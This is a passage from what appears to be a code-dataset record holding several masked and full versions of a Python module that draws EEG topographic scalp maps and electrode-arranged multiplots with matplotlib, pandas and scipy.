spectrum, frequencies, midpoints, axes = plt.specgram(\n self.data.ix[:, electrode], Fs=self.data.\n sampling_rate, vmin=vmin, vmax=vmax, axes=subaxes)\n if xlim is None:\n xlim = midpoints[0], midpoints[-1]\n subaxes.set_xlim(xlim)\n if ylim is None:\n ylim = frequencies[0], frequencies[-1]\n subaxes.set_ylim(ylim)\n else:\n raise ValueError(\"Wrong value for 'type' argument\")\n if not axis:\n subaxes.set_axis_off()\n subaxes.text(0.5, 0.95, electrode, transform=subaxes.\n transAxes, fontweight='bold', va='top', ha='center')\n subaxes.set_yticklabels([])\n subaxes.set_xticklabels([])\n self._subaxes.append(subaxes)\n\n @property\n def xlim(self):\n \"\"\"Return xlim for subplots.\"\"\"\n lim = [ax.get_xlim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @xlim.setter\n def xlim(self, left=None, right=None):\n \"\"\"Set x-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_xlim(left, right)\n self.figure.canvas.draw()\n\n @property\n def ylim(self):\n \"\"\"Return ylim for subplots.\"\"\"\n lim = [ax.get_ylim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @ylim.setter\n def ylim(self, bottom=None, top=None):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_ylim(bottom, top)\n self.figure.canvas.draw()\n\n @property\n def yscale(self):\n \"\"\"Return yscale for subplots.\"\"\"\n yscales = [ax.get_yscale() for ax in self._subaxes]\n return yscales\n\n @yscale.setter\n def yscale(self, value='linear'):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_yscale(value)\n self.figure.canvas.draw()\n\n def auto_ylim(self, xlim=None, yscale='linear'):\n \"\"\"Return an estimate for a good ylim.\n\n Parameters\n ----------\n xlim : 2-tuple, optional\n Limits in (the index of) the data from where the scaling should be\n computed.\n yscale : linear or log, optional\n Scaling of y-axis.\n\n \"\"\"\n electrodes = [col for col in self.data.columns if col in ELECTRODES]\n if xlim is None:\n data = self.data.ix[:, electrodes]\n else:\n indices = (self.data.index >= xlim[0]) & (self.data.index <=\n xlim[1])\n data = self.data.ix[indices, electrodes]\n min_data = data.min().min()\n max_data = data.max().max()\n abs_max = max(abs(min_data), max_data)\n if yscale == 'linear' or yscale == 'symlog':\n if min_data >= 0:\n ylim = 0, max_data\n else:\n ylim = -abs_max, abs_max\n elif yscale == 'log':\n if min_data > 0:\n ylim = min_data, max_data\n else:\n pseudo_zero = abs_max * 10 ** -5\n ylim = pseudo_zero, abs_max\n else:\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\n return ylim\n\n def draw(self, type='plot', title=None, xlim=None, ylim=None, vmin=None,\n vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw all components in multiplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n xlim : tuple of floats, optional\n X-axis limits used for each individual plots\n ylim : tuple of floats, optional\n Y-axis limits used for each individual plots\n\n \"\"\"\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.draw_head()\n self.draw_inner_head()\n self.draw_nose()\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin, vmax=\n vmax, axis=axis, yscale=yscale)\n if title is not None:\n self.axes.set_title(title)\n self.yscale = yscale\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TopoPlot(object):\n \"\"\"Topographic plot.\"\"\"\n\n def __init__(self, data=None, axes=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.Series or dict\n Pandas Series with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self.center = np.array((0, 0))\n if isinstance(data, dict):\n self.data = pd.Series(data)\n elif isinstance(data, pd.Series):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n @staticmethod\n def normalize_electrode_name(name):\n \"\"\"Normalize electrode name.\n\n Parameters\n ----------\n name : str\n Name of electrode to be normalized\n\n Examples\n --------\n >>> TopoPlot.normalize_electrode_name('fpz')\n 'Fpz'\n\n >>> TopoPlot.normalize_electrode_name('AFZ')\n 'AFz'\n\n \"\"\"\n return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')\n\n def draw_electrodes(self):\n \"\"\"Draw electrodes.\"\"\"\n for electrode, position in ELECTRODES.items():\n circle = plt.Circle(self.center + position, radius=0.04, fill=\n True, facecolor=(1, 1, 1))\n self.axes.add_patch(circle)\n position = self.center + position\n self.axes.text(position[0], position[1], electrode,\n verticalalignment='center', horizontalalignment='center',\n size=6)\n\n def draw_head(self):\n \"\"\"Draw outer head.\"\"\"\n circle = plt.Circle(self.center, radius=1, fill=False)\n self.axes.add_patch(circle)\n\n def draw_inner_head(self):\n \"\"\"Draw inner head.\"\"\"\n circle = plt.Circle(self.center, radius=0.8, fill=False)\n self.axes.add_patch(circle)\n\n def draw_nose(self):\n \"\"\"Draw nose.\"\"\"\n nose = plt.Line2D([sin(-0.1), 0, sin(0.1)], [cos(-0.1), 1.1, cos(\n 0.1)], color=(0, 0, 0))\n self.axes.add_line(nose)\n\n def draw_data(self, method='linear', number_of_contours=10):\n \"\"\"Draw countours from provided data.\"\"\"\n if self.data is not None:\n xi, yi = np.mgrid[-1:1:100.0j, -1:1:100.0j]\n points = []\n for electrode in self.data.index:\n name = TopoPlot.normalize_electrode_name(electrode)\n points.append(ELECTRODES[name])\n zi = griddata(points, self.data.values, (xi, yi), method=method)\n if number_of_contours is None:\n number_of_contours = 10\n plt.contourf(xi, yi, zi, number_of_contours)\n\n def draw(self, title=None, method='linear', number_of_contours=None):\n \"\"\"Draw all components in topoplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = TopoPlot(data)\n >>> topo_plot.draw()\n\n \"\"\"\n self.draw_head()\n self.draw_inner_head()\n self.draw_electrodes()\n self.draw_nose()\n self.draw_data(method=method, number_of_contours=number_of_contours)\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.axes.axis('equal')\n if title is not None:\n self.axes.set_title(title)\n\n\nclass MultiPlot(TopoPlot):\n \"\"\"Multiple plots organized topographically.\n\n References\n ----------\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\n\n \"\"\"\n\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\n 
\"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.DataFrame\n Pandas DataFrame with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self._subaxes = []\n self.xlim = xlim\n self.ylim = ylim\n self.center = np.array((0, 0))\n if isinstance(data, pd.DataFrame):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\n \"\"\"Add subaxes to currect specified axes.\n\n References\n ----------\n Pablo https://stackoverflow.com/users/2309442/pablo\n\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\n https://stackoverflow.com/questions/17458580/\n\n \"\"\"\n box = ax.get_position()\n width, height = box.width, box.height\n subaxes_box = [(rect[0], rect[1]), (rect[0] + rect[2], rect[1] +\n rect[3])]\n subaxes_display_coords = ax.transData.transform(subaxes_box)\n trans_figure = self.figure.transFigure.inverted()\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\n x, y = subaxes_figure_coords[0, :]\n width, height = subaxes_figure_coords[1, :] - subaxes_figure_coords[\n 0, :]\n subaxes = self.figure.add_axes([x, y, width, height], axis_bgcolor=\n axis_bgcolor)\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2] ** 0.5\n y_labelsize *= rect[3] ** 0.5\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\n return subaxes\n\n def draw_data(self, type='plot', width=None, height=None, xlim=None,\n ylim=None, vmin=None, vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw data.\n\n Parameters\n ----------\n type : 'plot', 'spectrogram', optional\n Type of plot\n xlim : 2-tuple of floats, optional\n X-axis limits\n ylim : 2-tuple of floats, optional\n Y-axis limits\n vmin : float, optional\n Minimum value for spectrogram colormap\n vmax : float, optional\n Maximum value for spectrogram colormap\n axis : bool, optional\n Determine whether the axis should be shown\n\n \"\"\"\n if self.data is not None:\n if ylim is None:\n if self.ylim is None and type != 'spectrogram':\n ylim = self.auto_ylim(xlim, yscale=yscale)\n else:\n ylim = self.ylim\n if xlim is None:\n xlim = self.xlim\n if vmin is None:\n vmin = 0\n number_of_electrodes = len([electrode for electrode in self.\n data.columns if electrode in ELECTRODES])\n if width is None:\n if number_of_electrodes > 32:\n width = 0.15\n else:\n width = 0.25\n if height is None:\n height = 0.25\n for electrode in self.data.columns:\n if electrode in ELECTRODES:\n x, y = ELECTRODES[electrode]\n subaxes = self.add_subplot_axes(self.axes, [x - width /\n 2, y - height / 2, width, height], axis_bgcolor='w')\n if type == 'plot':\n self.data.ix[:, electrode].plot(ax=subaxes, xlim=\n xlim, ylim=ylim)\n if not axis:\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transData)\n line = lines.Line2D((0, 1), (0, 0), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transAxes)\n line = lines.Line2D((0, 0), (0, 1), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n elif type == 'spectrogram':\n 
spectrum, frequencies, midpoints, axes = plt.specgram(\n self.data.ix[:, electrode], Fs=self.data.\n sampling_rate, vmin=vmin, vmax=vmax, axes=subaxes)\n if xlim is None:\n xlim = midpoints[0], midpoints[-1]\n subaxes.set_xlim(xlim)\n if ylim is None:\n ylim = frequencies[0], frequencies[-1]\n subaxes.set_ylim(ylim)\n else:\n raise ValueError(\"Wrong value for 'type' argument\")\n if not axis:\n subaxes.set_axis_off()\n subaxes.text(0.5, 0.95, electrode, transform=subaxes.\n transAxes, fontweight='bold', va='top', ha='center')\n subaxes.set_yticklabels([])\n subaxes.set_xticklabels([])\n self._subaxes.append(subaxes)\n\n @property\n def xlim(self):\n \"\"\"Return xlim for subplots.\"\"\"\n lim = [ax.get_xlim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @xlim.setter\n def xlim(self, left=None, right=None):\n \"\"\"Set x-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_xlim(left, right)\n self.figure.canvas.draw()\n\n @property\n def ylim(self):\n \"\"\"Return ylim for subplots.\"\"\"\n lim = [ax.get_ylim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @ylim.setter\n def ylim(self, bottom=None, top=None):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_ylim(bottom, top)\n self.figure.canvas.draw()\n\n @property\n def yscale(self):\n \"\"\"Return yscale for subplots.\"\"\"\n yscales = [ax.get_yscale() for ax in self._subaxes]\n return yscales\n\n @yscale.setter\n def yscale(self, value='linear'):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_yscale(value)\n self.figure.canvas.draw()\n\n def auto_ylim(self, xlim=None, yscale='linear'):\n \"\"\"Return an estimate for a good ylim.\n\n Parameters\n ----------\n xlim : 2-tuple, optional\n Limits in (the index of) the data from where the scaling should be\n computed.\n yscale : linear or log, optional\n Scaling of y-axis.\n\n \"\"\"\n electrodes = [col for col in self.data.columns if col in ELECTRODES]\n if xlim is None:\n data = self.data.ix[:, electrodes]\n else:\n indices = (self.data.index >= xlim[0]) & (self.data.index <=\n xlim[1])\n data = self.data.ix[indices, electrodes]\n min_data = data.min().min()\n max_data = data.max().max()\n abs_max = max(abs(min_data), max_data)\n if yscale == 'linear' or yscale == 'symlog':\n if min_data >= 0:\n ylim = 0, max_data\n else:\n ylim = -abs_max, abs_max\n elif yscale == 'log':\n if min_data > 0:\n ylim = min_data, max_data\n else:\n pseudo_zero = abs_max * 10 ** -5\n ylim = pseudo_zero, abs_max\n else:\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\n return ylim\n\n def draw(self, type='plot', title=None, xlim=None, ylim=None, vmin=None,\n vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw all components in multiplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n xlim : tuple of floats, optional\n X-axis limits used for each individual plots\n ylim : tuple of floats, optional\n Y-axis limits used for each individual plots\n\n \"\"\"\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.draw_head()\n self.draw_inner_head()\n self.draw_nose()\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin, vmax=\n vmax, axis=axis, yscale=yscale)\n if title is not None:\n self.axes.set_title(title)\n self.yscale = yscale\n\n\ndef topoplot(data=None, axes=None, method='linear', number_of_contours=10,\n title=None, xlim=None, ylim=None):\n \"\"\"Plot topographic map of the scalp in 2-D circular 
view.\n\n Draw the colored scalp map based on data in a Pandas Series where\n the values are indexed according to electrode name.\n\n Parameters\n ----------\n data : pandas.Series or pandas.DataFrame, optional\n Series with values and indexed by electrode names.\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n xlim : 2-tuple of floats, optional\n Limits of x-axis in multiplot\n ylim : 2-tuple of floats, optional\n Limits of y-axis in multiplot\n\n References\n ----------\n https://github.com/compmem/ptsa/blob/master/ptsa/plotting/topo.py\n\n http://sccn.ucsd.edu/~jung/tutorial/topoplot.htm\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = topoplot(data)\n\n \"\"\"\n if isinstance(data, pd.Series) or isinstance(data, dict) or data is None:\n topo_plot = TopoPlot(data=data, axes=axes)\n topo_plot.draw(title=title, method=method, number_of_contours=\n number_of_contours)\n return topo_plot\n elif isinstance(data, pd.DataFrame):\n multi_plot = MultiPlot(data=data, axes=axes)\n multi_plot.draw(title=title, xlim=xlim, ylim=ylim)\n return multi_plot\n\n\ndef show():\n \"\"\"Show plot.\"\"\"\n plt.show()\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python\r\n\"\"\"\r\nPlot EEG data.\r\n\r\nUsage:\r\n plotting.py [options] [<file>]\r\n\r\nOptions:\r\n -h --help Show this screen.\r\n --version Show version.\r\n --center Center the data before plotting\r\n --sample-index=N Row index (indexed from one).\r\n --transpose Transpose data.\r\n --xlim=lim X-axis limits.\r\n\r\nData\r\n----\r\nELECTRODES : dict\r\n Dictionary indexed by electrode name with 2D positions as values\r\n\r\nReferences\r\n----------\r\nThe five percent electrode system for high-resolution EEG and ERP\r\nmeasurement, Robert Oostenveld, Peter Praamstra.\r\n\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import, division, print_function\r\n\r\nfrom math import cos, pi, sin\r\n\r\nimport matplotlib.lines as lines\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.transforms as transforms\r\n\r\nimport numpy as np\r\n\r\nimport pandas as pd\r\n\r\nfrom scipy.interpolate import griddata\r\n\r\n\r\n__all__ = ('ELECTRODES', 'MultiPlot', 'TopoPlot', 'topoplot')\r\n\r\n\r\nELECTRODES = {\r\n 'AF3': (-0.25, 0.62),\r\n 'AF4': (0.25, 0.62),\r\n 'AF7': (0.8 * cos(0.7 * pi), 0.8 * sin(0.7 * pi)),\r\n 'AF8': (0.8 * cos(0.3 * pi), 0.8 * sin(0.3 * pi)),\r\n 'AFz': (0, 0.6),\r\n 'C1': (-0.2, 0),\r\n 'C2': (0.2, 0),\r\n 'C3': (-0.4, 0),\r\n 'C4': (0.4, 0),\r\n 'C5': (-0.6, 0),\r\n 'C6': (0.6, 0),\r\n 'CP1': (-0.18, -0.2),\r\n 'CP2': (0.18, -0.2),\r\n 'CP3': (-0.36, 0.4 * sin(1.17 * pi)),\r\n 'CP4': (0.36, 0.4 * sin(1.83 * pi)),\r\n 'CP5': (0.6 * cos(1.12 * pi), 0.6 * sin(1.12 * pi)),\r\n 'CP6': (0.6 * cos(1.88 * pi), 0.6 * sin(1.88 * pi)),\r\n 'CPz': (0, -0.2),\r\n 'Cz': (0, 0),\r\n 'F1': (-0.18, 0.4),\r\n 'F2': (0.18, 0.4),\r\n 'F3': (-0.35, 0.41),\r\n 'F4': (0.35, 0.41),\r\n 'F5': (-0.5, 0.43),\r\n 'F6': (0.5, 0.43),\r\n 'F7': (0.8 * cos(0.8 * pi), 0.8 * sin(0.8 * pi)),\r\n 'F8': (0.8 * cos(0.2 * pi), 0.8 * sin(0.2 * pi)),\r\n 'FC1': (-0.2, 0.21),\r\n 'FC2': (0.2, 0.21),\r\n 'FC3': (-0.39, 0.22),\r\n 'FC4': (0.39, 0.22),\r\n 'FC5': (-0.57, 0.23),\r\n 'FC6': (0.57, 0.23),\r\n 'FCz': (0, 0.2),\r\n 'FP1': (0.8 * cos(0.6 * pi), 0.8 * sin(0.6 * pi)),\r\n 'FP2': (0.8 * cos(0.4 * pi), 0.8 * sin(0.4 * pi)),\r\n 'Fpz': (0, 0.8),\r\n 'FT7': (0.8 * cos(0.9 * pi), 0.8 * sin(0.9 * pi)),\r\n 'FT8': (0.8 * cos(0.1 * pi), 0.8 * sin(0.1 * pi)),\r\n 'Fz': (0, 0.4),\r\n 'Iz': (0, -1),\r\n 'Nz': (0, 1),\r\n 'P1': (-0.18, -0.41),\r\n 'P2': (0.18, -0.41),\r\n 'P3': (-0.35, -0.42),\r\n 'P4': (0.35, -0.42),\r\n 'P5': (-0.5, -0.44),\r\n 'P6': (0.5, -0.44),\r\n 'P7': (0.8 * cos(1.2 * pi), 0.8 * sin(1.2 * pi)),\r\n 'P8': (0.8 * cos(1.8 * pi), 0.8 * sin(1.8 * pi)),\r\n 'PO3': (-0.24, -0.62),\r\n 'PO4': (0.24, -0.62),\r\n 'PO7': (0.8 * cos(1.3 * pi), 0.8 * sin(1.3 * pi)),\r\n 'PO8': (0.8 * cos(1.7 * pi), 0.8 * sin(1.7 * pi)),\r\n 'POz': (0, -0.6),\r\n 'Pz': (0, -0.4),\r\n 'O1': (0.8 * cos(1.4 * pi), 0.8 * sin(1.4 * pi)),\r\n 'O2': (0.8 * cos(1.6 * pi), 0.8 * sin(1.6 * pi)),\r\n 'Oz': (0, -0.8),\r\n 'T7': (-0.8, 0),\r\n 'T8': (0.8, 0),\r\n 'T9': (-1, 0),\r\n 'T10': (1, 0),\r\n 'TP7': (0.8 * cos(1.1 * pi), 0.8 * sin(1.1 * pi)),\r\n 'TP8': (0.8 * cos(1.9 * pi), 0.8 * sin(1.9 * pi)),\r\n 'TP9': (cos(1.1 * pi), sin(1.1 * pi)),\r\n 'TP10': (cos(1.9 * pi), sin(1.9 * pi)),\r\n}\r\n\r\n\r\nclass TopoPlot(object):\r\n \"\"\"Topographic plot.\"\"\"\r\n\r\n def __init__(self, data=None, axes=None):\r\n \"\"\"Setup defaults.\r\n\r\n Parameters\r\n ----------\r\n data : Pandas.Series or dict\r\n Pandas Series with values indexed by electrodes.\r\n axes : matplotlib.axes.AxesSubplot object\r\n 
Axis object to render on.\r\n\r\n \"\"\"\r\n if axes is None:\r\n self.figure = plt.figure()\r\n axes = self.figure.gca()\r\n else:\r\n self.figure = axes.get_figure()\r\n self.axes = axes\r\n self.center = np.array((0, 0))\r\n if isinstance(data, dict):\r\n self.data = pd.Series(data)\r\n elif isinstance(data, pd.Series):\r\n self.data = data\r\n elif data is None:\r\n self.data = None\r\n else:\r\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\r\n type(data)))\r\n\r\n @staticmethod\r\n def normalize_electrode_name(name):\r\n \"\"\"Normalize electrode name.\r\n\r\n Parameters\r\n ----------\r\n name : str\r\n Name of electrode to be normalized\r\n\r\n Examples\r\n --------\r\n >>> TopoPlot.normalize_electrode_name('fpz')\r\n 'Fpz'\r\n\r\n >>> TopoPlot.normalize_electrode_name('AFZ')\r\n 'AFz'\r\n\r\n \"\"\"\r\n return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')\r\n\r\n def draw_electrodes(self):\r\n \"\"\"Draw electrodes.\"\"\"\r\n for electrode, position in ELECTRODES.items():\r\n circle = plt.Circle(self.center + position,\r\n radius=0.04, fill=True,\r\n facecolor=(1, 1, 1))\r\n self.axes.add_patch(circle)\r\n position = self.center + position\r\n self.axes.text(position[0], position[1], electrode,\r\n verticalalignment='center',\r\n horizontalalignment='center',\r\n size=6)\r\n\r\n def draw_head(self):\r\n \"\"\"Draw outer head.\"\"\"\r\n circle = plt.Circle(self.center, radius=1, fill=False)\r\n self.axes.add_patch(circle)\r\n\r\n def draw_inner_head(self):\r\n \"\"\"Draw inner head.\"\"\"\r\n circle = plt.Circle(self.center, radius=0.8, fill=False)\r\n self.axes.add_patch(circle)\r\n\r\n def draw_nose(self):\r\n \"\"\"Draw nose.\"\"\"\r\n nose = plt.Line2D([sin(-0.1), 0, sin(0.1)],\r\n [cos(-0.1), 1.1, cos(0.1)],\r\n color=(0, 0, 0))\r\n self.axes.add_line(nose)\r\n\r\n def draw_data(self, method='linear', number_of_contours=10):\r\n \"\"\"Draw countours from provided data.\"\"\"\r\n if self.data is not None:\r\n # Coordinates for points to interpolate to\r\n xi, yi = np.mgrid[-1:1:100j, -1:1:100j]\r\n\r\n # Electrode positions for data to interpolate from\r\n points = []\r\n for electrode in self.data.index:\r\n name = TopoPlot.normalize_electrode_name(electrode)\r\n points.append(ELECTRODES[name])\r\n\r\n # Interpolate\r\n # TODO: Will not work with 2 electrodes.\r\n zi = griddata(points, self.data.values, (xi, yi), method=method)\r\n\r\n # Defaults\r\n if number_of_contours is None:\r\n number_of_contours = 10\r\n\r\n # Draw\r\n plt.contourf(xi, yi, zi, number_of_contours)\r\n\r\n # TODO: center\r\n\r\n def draw(self, title=None, method='linear', number_of_contours=None):\r\n \"\"\"Draw all components in topoplot including the data.\r\n\r\n Parameters\r\n ----------\r\n title : str, optional\r\n Title to put on the plot\r\n methods : str, optional\r\n Interpolation method\r\n number_of_contours : int\r\n Number of contours in the colored plot.\r\n\r\n Examples\r\n --------\r\n >>> import matplotlib.pyplot as plt\r\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\r\n >>> plt.ion()\r\n >>> topo_plot = TopoPlot(data)\r\n >>> topo_plot.draw()\r\n\r\n \"\"\"\r\n self.draw_head()\r\n self.draw_inner_head()\r\n self.draw_electrodes()\r\n self.draw_nose()\r\n self.draw_data(method=method, number_of_contours=number_of_contours)\r\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\r\n self.axes.axis('equal')\r\n if title is not None:\r\n self.axes.set_title(title)\r\n\r\n\r\nclass MultiPlot(TopoPlot):\r\n \"\"\"Multiple plots organized topographically.\r\n\r\n 
References\r\n ----------\r\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\r\n\r\n \"\"\"\r\n\r\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\r\n \"\"\"Setup defaults.\r\n\r\n Parameters\r\n ----------\r\n data : Pandas.DataFrame\r\n Pandas DataFrame with values indexed by electrodes.\r\n axes : matplotlib.axes.AxesSubplot object\r\n Axis object to render on.\r\n\r\n \"\"\"\r\n if axes is None:\r\n self.figure = plt.figure()\r\n axes = self.figure.gca()\r\n else:\r\n self.figure = axes.get_figure()\r\n self.axes = axes\r\n\r\n # Contains a list of axes used to plot data data from individual\r\n # electrodes\r\n self._subaxes = []\r\n\r\n self.xlim = xlim\r\n self.ylim = ylim\r\n\r\n self.center = np.array((0, 0))\r\n\r\n if isinstance(data, pd.DataFrame):\r\n self.data = data\r\n elif data is None:\r\n self.data = None\r\n else:\r\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\r\n type(data)))\r\n\r\n def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\r\n \"\"\"Add subaxes to currect specified axes.\r\n\r\n References\r\n ----------\r\n Pablo https://stackoverflow.com/users/2309442/pablo\r\n\r\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\r\n https://stackoverflow.com/questions/17458580/\r\n\r\n \"\"\"\r\n # Modified from\r\n # https://stackoverflow.com/questions/17458580/\r\n box = ax.get_position()\r\n width, height = box.width, box.height\r\n subaxes_box = [(rect[0], rect[1]),\r\n (rect[0] + rect[2], rect[1] + rect[3])]\r\n subaxes_display_coords = ax.transData.transform(subaxes_box)\r\n trans_figure = self.figure.transFigure.inverted()\r\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\r\n x, y = subaxes_figure_coords[0, :]\r\n width, height = (subaxes_figure_coords[1, :] -\r\n subaxes_figure_coords[0, :])\r\n subaxes = self.figure.add_axes(\r\n [x, y, width, height], axis_bgcolor=axis_bgcolor)\r\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\r\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\r\n x_labelsize *= rect[2] ** 0.5\r\n y_labelsize *= rect[3] ** 0.5\r\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\r\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\r\n return subaxes\r\n\r\n def draw_data(self, type='plot', width=None, height=None,\r\n xlim=None, ylim=None,\r\n vmin=None, vmax=None,\r\n axis=False, yscale='linear'):\r\n \"\"\"Draw data.\r\n\r\n Parameters\r\n ----------\r\n type : 'plot', 'spectrogram', optional\r\n Type of plot\r\n xlim : 2-tuple of floats, optional\r\n X-axis limits\r\n ylim : 2-tuple of floats, optional\r\n Y-axis limits\r\n vmin : float, optional\r\n Minimum value for spectrogram colormap\r\n vmax : float, optional\r\n Maximum value for spectrogram colormap\r\n axis : bool, optional\r\n Determine whether the axis should be shown\r\n\r\n \"\"\"\r\n if self.data is not None:\r\n\r\n if ylim is None:\r\n if self.ylim is None and type != 'spectrogram':\r\n ylim = self.auto_ylim(xlim, yscale=yscale)\r\n else:\r\n ylim = self.ylim\r\n\r\n if xlim is None:\r\n xlim = self.xlim\r\n\r\n if vmin is None:\r\n vmin = 0\r\n\r\n # Determine a suitable width for subaxes\r\n number_of_electrodes = len([\r\n electrode\r\n for electrode in self.data.columns\r\n if electrode in ELECTRODES])\r\n if width is None:\r\n if number_of_electrodes > 32:\r\n width = 0.15\r\n else:\r\n width = 0.25\r\n if height is None:\r\n height = 0.25\r\n\r\n for electrode in self.data.columns:\r\n if electrode in ELECTRODES:\r\n\r\n # Axes and position\r\n 
x, y = ELECTRODES[electrode]\r\n subaxes = self.add_subplot_axes(\r\n self.axes,\r\n [x - width / 2, y - height / 2, width, height],\r\n axis_bgcolor='w')\r\n\r\n # Actual data plot\r\n if type == 'plot':\r\n self.data.ix[:, electrode].plot(\r\n ax=subaxes, xlim=xlim, ylim=ylim)\r\n\r\n if not axis:\r\n # x-axis\r\n trans = transforms.blended_transform_factory(\r\n subaxes.transAxes, subaxes.transData)\r\n line = lines.Line2D(\r\n (0, 1), (0, 0),\r\n transform=trans, color=(0, 0, 0))\r\n subaxes.add_line(line)\r\n\r\n trans = transforms.blended_transform_factory(\r\n subaxes.transAxes, subaxes.transAxes)\r\n line = lines.Line2D(\r\n (0, 0), (0, 1),\r\n transform=trans, color=(0, 0, 0))\r\n subaxes.add_line(line)\r\n\r\n elif type == 'spectrogram':\r\n spectrum, frequencies, midpoints, axes = plt.specgram(\r\n self.data.ix[:, electrode],\r\n Fs=self.data.sampling_rate,\r\n vmin=vmin,\r\n vmax=vmax,\r\n axes=subaxes)\r\n\r\n # Adjust axis around spectrogram image.\r\n if xlim is None:\r\n xlim = midpoints[0], midpoints[-1]\r\n subaxes.set_xlim(xlim)\r\n if ylim is None:\r\n ylim = frequencies[0], frequencies[-1]\r\n subaxes.set_ylim(ylim)\r\n\r\n else:\r\n raise ValueError(\"Wrong value for 'type' argument\")\r\n\r\n if not axis:\r\n subaxes.set_axis_off()\r\n\r\n # Annotation\r\n # http://matplotlib.org/users/transforms_tutorial.html\r\n subaxes.text(0.5, 0.95, electrode,\r\n transform=subaxes.transAxes,\r\n fontweight='bold', va='top', ha='center')\r\n subaxes.set_yticklabels([])\r\n subaxes.set_xticklabels([])\r\n\r\n self._subaxes.append(subaxes)\r\n\r\n @property\r\n def xlim(self):\r\n \"\"\"Return xlim for subplots.\"\"\"\r\n lim = [ax.get_xlim() for ax in self._subaxes]\r\n if lim == []:\r\n lim = None\r\n return lim\r\n\r\n @xlim.setter\r\n def xlim(self, left=None, right=None):\r\n \"\"\"Set x-axis limits on all subplots.\"\"\"\r\n for ax in self._subaxes:\r\n ax.set_xlim(left, right)\r\n self.figure.canvas.draw()\r\n\r\n @property\r\n def ylim(self):\r\n \"\"\"Return ylim for subplots.\"\"\"\r\n lim = [ax.get_ylim() for ax in self._subaxes]\r\n if lim == []:\r\n lim = None\r\n return lim\r\n\r\n @ylim.setter\r\n def ylim(self, bottom=None, top=None):\r\n \"\"\"Set y-axis limits on all subplots.\"\"\"\r\n for ax in self._subaxes:\r\n 